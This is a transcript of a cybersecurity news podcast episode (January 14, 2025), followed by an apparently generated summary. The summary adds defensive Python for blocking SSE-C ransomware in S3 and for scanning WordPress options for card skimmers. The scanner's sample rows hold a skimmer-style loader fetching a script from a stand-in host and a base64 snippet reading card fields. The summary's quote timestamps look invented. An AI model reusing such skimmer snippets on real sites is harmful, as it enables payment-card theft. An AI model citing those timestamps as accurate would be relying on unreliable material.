
Lauren Verno
From the CISO Series, it's Cyber Security Headlines. These are the cybersecurity headlines for Tuesday, January 14, 2025. I'm Lauren Verno.

Telefonica Breach Exposes Internal Data and Employee Credentials

A massive breach for telecom giant Telefonica, as hackers with the Hellcat ransomware group were able to steal over 236,000 lines of customer data, 469,000 lines of internal Jira ticketing data and 24,000 employee emails. The group leveraged infostealer malware to compromise credentials from 15 employees, including two with administrative privileges, resulting in an estimated 2.3 gigabytes of data stolen. One cybersecurity vendor called the breach, quote, imminent, noting that 531 employee computers were infected by infostealers last year.

New Ransomware Group Leverages AI

Emerging ransomware group FunkSec has claimed responsibility for over 80 attacks in December of 2024 using Rust-based ransomware likely created with AI by inexperienced threat actors. Operating under a ransomware-as-a-service model, the group engages in double extortion and sells stolen data at discounted prices. FunkSec has also launched a data leak site featuring custom tools, including a DDoS utility and an AI chatbot, aligning its operations with hacktivist campaigns like the Free Palestine movement. While the group recycles data from prior attacks, its low ransom demands and Tor-based operations have already garnered attention in cybercrime forums.

Allstate Accused of Selling Consumer Driving Data

Texas Attorney General Ken Paxton has filed a lawsuit against Allstate and its subsidiary Arity, accusing them of illegally collecting, using and selling cell phone location and movement data from over 45 million Americans without their knowledge. Harvested through embedded software and mobile apps, it was used to create a massive driving behavior database that insurers access to adjust premiums and price quotes. The collection of the data violates Texas's new Data Privacy and Security Act, and this legal action marks the first state-level enforcement of a comprehensive data privacy law, with automakers and popular mobile apps also implicated in the alleged scheme.

Nominet Confirms Breach Using Ivanti Zero-Day

Nominet, the UK domain registry managing over 11 million domains, has confirmed a breach exploiting an Ivanti VPN zero-day vulnerability. According to a statement to BleepingComputer, the entry point was through third-party VPN software supplied by Ivanti that enables our people to access systems remotely. While no data theft or backdoors have been identified, Nominet is the first organization to publicly confirm an attack using this specific exploit.

Thanks to today's episode sponsor, Dropzone AI. Running a SOC is tough. Too many alerts, not enough time. Dropzone AI changes that. It reduces manual investigations by up to 90%, giving your team the bandwidth to focus on strategic threats. Imagine the impact on your operations. Visit Dropzone AI today. That's D-R-O-P-Z-O-N-E AI.

OneBlood Confirms Sensitive Data Stolen

You've likely seen the big red bus at your company's office or even a local movie theater asking you to give blood to save lives. Well, now the company is confirming that some gave more than just their blood. The major blood supplier confirmed that donor names and Social Security numbers were stolen during a ransomware attack in July of last year. The breach, lasting from July 14 to July 29, caused critical blood shortages, and OneBlood is now offering one year of free credit monitoring to affected individuals. Now, while the organization has notified victims as promised, there was a six-month delay in the notification process.

CodeFinger Ransomware Campaign Targets AWS

A ransomware group named CodeFinger is encrypting Amazon S3 buckets using AWS's server-side encryption with customer-provided keys, leaving victims unable to recover data without the attacker's decryption key. The threat actors leverage compromised AWS credentials to encrypt data and demand Bitcoin ransoms, threatening to delete files if negotiations fail.

New WordPress Skimmer Campaign

A warning for WordPress e-commerce sites about a new credit card skimmer that injects malicious JavaScript into database entries, stealing payment details on checkout pages. The skimmer hides in the wp_options table, avoiding detection while mimicking legitimate payment processors like Stripe to capture sensitive user data. In a related trend, attackers are exploiting transaction simulation features in Web3 wallets to drain funds, while PayPal users are being targeted by phishing emails that hijack accounts through legitimate-looking payment requests.

Microsoft Sues to Stop Malicious AI Misuse

Microsoft is taking legal action to stop cybercriminals exploiting generative AI services to create malicious tools. According to a lawsuit filed in Virginia, the attackers used stolen credentials to alter AI capabilities, facilitating the reselling of access and providing instructions for generating harmful content. Microsoft has since revoked the group's access and released a statement saying, quote, with this action we are sending a clear message: the weaponization of our AI technology by online actors will not be tolerated, end quote.

Open source is a bedrock of modern organizations, but we've taken securing it for granted, with many vital pieces of software still largely maintained by volunteers. So how do we keep these software packages secure when the point of failure could be a single developer? That's what we're breaking down on one of our segments in the latest episode of the CISO Series Podcast. Look for "I support open source as long as I don't have to invest in it" in your podcast app of choice. I'm Lauren Verno reporting for the CISO Series. Cyber Security Headlines are available every weekday. Head to CISOseries.com for the full stories behind the headlines.
Cyber Security Headlines - January 14, 2025 Hosted by Lauren Verno, CISO Series
In a significant security incident, Telefonica, a leading telecommunications giant, fell victim to a massive data breach orchestrated by the Hellcat Ransomware Group. The attackers successfully exfiltrated over 236,000 lines of customer data, 469,000 lines of internal Jira ticketing data, and 24,000 employee emails.
Lauren Verno reports, “[00:01:15] the group leveraged Infostealer malware to compromise credentials from 15 employees, including two with administrative privileges,” leading to an estimated 2.3 gigabytes of stolen data. The breach is described by a cybersecurity vendor as "imminent," highlighting the severity with over 531 employee computers infected by Infostealer malware just last year. This incident underscores the persistent vulnerabilities within large organizations and the critical need for robust credential protection measures.
A novel ransomware faction, FunkSec, has emerged, claiming responsibility for more than 80 attacks in December 2024. Utilizing Rust-based ransomware, the group is believed to employ Artificial Intelligence (AI) in crafting its malicious tools, despite being comprised of relatively inexperienced threat actors.
Operating under a Ransomware-as-a-Service (RaaS) model, FunkSec engages in double extortion, where they not only encrypt victims' data but also threaten to leak stolen information unless ransoms are paid. Lauren notes, “[00:05:42] FunkSec has also launched a data leak site featuring custom tools including a DDoS utility and an AI chatbot,” aligning their operations with hacktivist movements such as the Free Palestine Movement. The group’s strategy of recycling data from previous attacks, coupled with low ransom demands and Tor-based operations, has already attracted significant attention within cybercrime forums.
Allstate, a major insurance provider, is facing legal challenges as Texas Attorney General Ken Paxton files a lawsuit alleging the company, along with its subsidiary, illegally collected, used, and sold cell phone location and movement data from over 45 million Americans without their consent. This data was harvested through embedded software and mobile apps to create a comprehensive driving behavior database, which was purportedly used to adjust insurance premiums and price quotes.
Lauren explains, “[00:12:30] The collection of this data violates Texas's new Data Privacy and Security Act,” marking a pivotal moment as it represents the first state-level enforcement of a comprehensive data privacy law. The lawsuit also implicates automakers and popular mobile applications, broadening the scope of the alleged scheme and emphasizing the growing scrutiny over data privacy practices in the insurance and automotive industries.
Nominet, the UK-based domain registry managing over 11 million domains, has officially confirmed a breach exploiting an Ivanti VPN zero-day vulnerability. According to a statement shared with BleepingComputer, the intrusion was facilitated through third-party VPN software provided by Ivanti, which allows remote access to Nominet’s systems.
Lauren states, “[00:17:05] While no data theft or backdoors have been identified, Nominet is the first organization to publicly confirm an attack using this specific exploit.” This breach highlights the vulnerabilities introduced through third-party software integrations and the critical importance of securing remote access pathways to prevent unauthorized access.
In a concerning development, OneBlood, a major blood supplier, has confirmed that during a ransomware attack in July of the previous year, donor names and Social Security numbers were stolen. The breach, which occurred between July 14 and July 29, not only led to critical blood shortages but also compromised sensitive personal information.
Lauren notes, “[00:20:50] The organization is now offering one year of free credit monitoring to affected individuals,” addressing the fallout from the breach. However, the incident is marred by a six-month delay in notifying victims, raising questions about the company's incident response and transparency practices.
The CodeFinger ransomware group has been actively targeting Amazon Web Services (AWS), specifically encrypting Amazon S3 buckets. The attackers use AWS's server-side encryption with customer-provided keys (SSE-C), so the key never leaves the attacker's hands and victims are left unable to decrypt their data without paying a Bitcoin ransom.
Lauren explains, “[00:23:40] The threat actors leverage compromised AWS credentials to encrypt data and demand ransoms, threatening to delete files if negotiations fail.” This tactic not only disrupts business operations but also emphasizes the importance of safeguarding cloud credentials and implementing robust encryption key management practices.
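As an added example, not code from the podcast or from any vendor mentioned on this page, the Python below shows the two controls a defender would want against the CodeFinger pattern: a bucket policy that refuses object writes made with customer-provided keys, and a scan of CloudTrail-style S3 data events for writes that carried the SSE-C header, grouped by the identity that issued them. The S3 condition key name, the request header name and the simplified event layout are assumptions made for this example; the events themselves are constructed.

```python
import json

# Condition key S3 evaluates when a request carries a customer-provided key
# (SSE-C). Assumed for this example to be the documented key name.
SSE_C_CONDITION_KEY = "s3:x-amz-server-side-encryption-customer-algorithm"


def deny_sse_c_policy(bucket: str) -> dict:
    """Bucket policy that refuses any object write using SSE-C.

    "Null": "false" matches when the SSE-C condition key IS present on the
    request, so this explicit Deny fires only for SSE-C writes and leaves
    SSE-S3 / SSE-KMS uploads untouched. An explicit Deny also wins over any
    Allow that a compromised identity might otherwise hold on the bucket.
    """
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "DenyObjectWritesWithCustomerProvidedKeys",
                "Effect": "Deny",
                "Principal": "*",
                "Action": "s3:PutObject",
                "Resource": f"arn:aws:s3:::{bucket}/*",
                "Condition": {"Null": {SSE_C_CONDITION_KEY: "false"}},
            }
        ],
    }


def policy_json(bucket: str) -> str:
    """Serialized form suitable for `aws s3api put-bucket-policy --policy file://...`."""
    return json.dumps(deny_sse_c_policy(bucket), indent=2)


# Detection side. Assumed, simplified layout of CloudTrail S3 data events;
# real records carry many more fields, but the ones used here are the ones
# that matter for this question.
SSE_C_REQUEST_HEADER = "x-amz-server-side-encryption-customer-algorithm"
WRITE_EVENT_NAMES = {"PutObject", "CopyObject"}


def find_sse_c_writes(events: list) -> list:
    """Return every S3 write event whose request supplied a customer-provided key."""
    hits = []
    for ev in events:
        if ev.get("eventSource") != "s3.amazonaws.com":
            continue
        if ev.get("eventName") not in WRITE_EVENT_NAMES:
            continue
        params = ev.get("requestParameters") or {}
        if SSE_C_REQUEST_HEADER not in params:
            continue
        hits.append({
            "time": ev.get("eventTime"),
            "principal": (ev.get("userIdentity") or {}).get("arn"),
            "source_ip": ev.get("sourceIPAddress"),
            "bucket": params.get("bucketName"),
            "key": params.get("key"),
        })
    return hits


def writes_per_principal(hits: list) -> dict:
    """One identity re-encrypting many objects in a short window is the pattern to alert on."""
    counts = {}
    for h in hits:
        counts[h["principal"]] = counts.get(h["principal"], 0) + 1
    return counts


# Constructed sample events (not real CloudTrail output).
_USER = "arn:aws:iam::123456789012:user/ci-deploy"
SAMPLE_EVENTS = [
    # Ordinary upload using SSE-S3: not flagged.
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject",
     "eventTime": "2025-01-13T02:00:11Z", "userIdentity": {"arn": _USER},
     "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"bucketName": "corp-backups", "key": "db/2025-01-13.sql.gz",
                           "x-amz-server-side-encryption": "AES256"}},
    # In-place copy that re-encrypts an object with a caller-supplied key: flagged.
    {"eventSource": "s3.amazonaws.com", "eventName": "CopyObject",
     "eventTime": "2025-01-13T03:14:02Z", "userIdentity": {"arn": _USER},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"bucketName": "corp-backups", "key": "db/2025-01-12.sql.gz",
                           SSE_C_REQUEST_HEADER: "AES256"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject",
     "eventTime": "2025-01-13T03:14:05Z", "userIdentity": {"arn": _USER},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"bucketName": "corp-backups", "key": "db/2025-01-11.sql.gz",
                           SSE_C_REQUEST_HEADER: "AES256"}},
    # A read with the header is not a write and is not flagged by this rule.
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "eventTime": "2025-01-13T03:20:00Z", "userIdentity": {"arn": _USER},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"bucketName": "corp-backups", "key": "db/2025-01-12.sql.gz",
                           SSE_C_REQUEST_HEADER: "AES256"}},
]

if __name__ == "__main__":
    print(policy_json("corp-backups"))
    hits = find_sse_c_writes(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print(writes_per_principal(hits))
```

The deny statement is preventive and applies only to buckets that carry it; the detector is retrospective and depends on S3 object-level (data event) logging being enabled for the bucket, which CloudTrail does not record by default. Neither recovers objects that were already re-encrypted, which is why the credential hygiene the story stresses comes first.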
A new wave of malicious activities targets WordPress eCommerce sites through a sophisticated credit card skimmer. Attackers inject malicious JavaScript into database entries, specifically hiding within the wp_options table. This method allows the skimmer to evade detection while mimicking legitimate payment processors like Stripe, thereby stealing payment details during the checkout process.
Lauren adds, “[00:27:15] In a related trend, attackers are exploiting transaction simulation features in Web3 wallets to drain funds,” indicating a broader pattern of exploiting both traditional and emerging technologies to commit fraud. Additionally, PayPal users are being targeted by phishing emails that hijack accounts through seemingly legitimate payment requests, further complicating the cybersecurity landscape.
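As an added example, not from the page, the WordPress project or any vendor named above, here is a small Python scanner for the hiding place the story describes: JavaScript stored inside wp_options values. It flags option values that contain script tags, obfuscation primitives, DOM-injection calls or payment-field names, and it decodes long base64 runs first so that a wrapped payload does not slip past the text patterns. The option rows and patterns are constructed for this example; the heuristics are a starting point to tune, not a signature set.

```python
import base64
import re

# Heuristic indicators of injected client-side code in an option value.
# Constructed for this example; each tuple is (pattern, reason reported).
SUSPICIOUS = [
    (re.compile(r"<script\b", re.I), "script tag in option value"),
    (re.compile(r"\b(eval|atob|unescape|String\.fromCharCode)\s*\(", re.I), "obfuscation primitive"),
    (re.compile(r"\bdocument\.(write|createElement)\b"), "DOM injection"),
    (re.compile(r"(card[_-]?number|cvv|cvc|expir)", re.I), "payment-field keyword"),
]

# Long runs of base64 alphabet; skimmers commonly stash the real payload this way.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")


def expand_base64_blobs(value: str) -> str:
    """Append the decoded text of any long base64 run so patterns inside it are visible."""
    decoded = []
    for m in BASE64_BLOB.finditer(value):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore"))
        except Exception:  # not valid base64 after all; ignore this run
            continue
    return value + "\n" + "\n".join(decoded)


def scan_option(option_name: str, option_value: str) -> list:
    """Return the list of reasons an option value looks like injected code (empty if clean)."""
    text = expand_base64_blobs(option_value)
    return [reason for pattern, reason in SUSPICIOUS if pattern.search(text)]


def scan_options(rows: list) -> list:
    """rows: iterable of (option_name, option_value) tuples, e.g. from a DB dump."""
    findings = []
    for name, value in rows:
        reasons = scan_option(name, value)
        if reasons:
            findings.append({"option_name": name, "reasons": reasons})
    return findings


# Constructed sample rows. The payload is built with b64encode here so the
# example stays readable; a real injection would store only the encoded blob.
_PAYLOAD = base64.b64encode(
    b"var n=document.querySelector('#card_number').value;"
    b"var v=document.querySelector('#cvv').value;"
).decode()

SAMPLE_ROWS = [
    ("siteurl", "https://shop.example"),
    # Legitimate payment-plugin settings: mentions Stripe, contains no code.
    ("woocommerce_stripe_settings",
     'a:2:{s:7:"enabled";s:3:"yes";s:15:"publishable_key";s:13:"pk_test_abcde";}'),
    # Injected loader that pulls a second-stage script from a lookalike host.
    ("widget_text",
     '<script>var s=document.createElement("script");s.src="https://cdn.example/pay.js";'
     'document.head.appendChild(s);</script>'),
    # Injected skimmer with its body hidden inside base64.
    ("_transient_cache_seed", f'<script>eval(atob("{_PAYLOAD}"))</script>'),
]

if __name__ == "__main__":
    for finding in scan_options(SAMPLE_ROWS):
        print(finding["option_name"], "->", ", ".join(finding["reasons"]))
```

Feed it rows from a database export or from WP-CLI's `wp option list`, and expect some noise: legitimate widgets and page builders do store HTML in options, so a hit is a reason to diff the value against a known-good backup rather than proof of compromise. The second sample row shows why matching on a processor's name alone would be the wrong rule: the skimmer mimics Stripe precisely because the real plugin's settings look like that.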
In a bold move, Microsoft has initiated legal action aimed at curbing the misuse of generative AI by cybercriminals. The lawsuit, filed in Virginia, accuses attackers of utilizing stolen credentials to manipulate AI capabilities, reselling access, and providing instructions for generating harmful content.
Lauren summarizes, “[00:30:10] Microsoft has since revoked the group's access and released a statement saying, ‘With this action, we are sending a clear message—the weaponization of our AI technology by online actors will not be tolerated.’” This legal stance underscores the tech giant's commitment to preventing the abuse of AI technologies and protecting the integrity of its services against malicious exploitation.
Today's cybersecurity landscape continues to evolve with sophisticated attacks targeting both large corporations and essential services. From massive data breaches like Telefonica and Nomi Net to emerging threats leveraging AI, the need for robust security measures has never been more critical. Legal actions against entities like Allstate and Microsoft’s proactive stance against AI misuse highlight the growing emphasis on accountability and regulation in the industry. As cyber threats diversify, staying informed and implementing comprehensive security strategies remain paramount for organizations worldwide.
For a deeper dive into these stories and more, visit CISOseries.com.
This summary was generated based on the transcript of the "Cyber Security Headlines" podcast episode released on January 14, 2025, by CISO Series.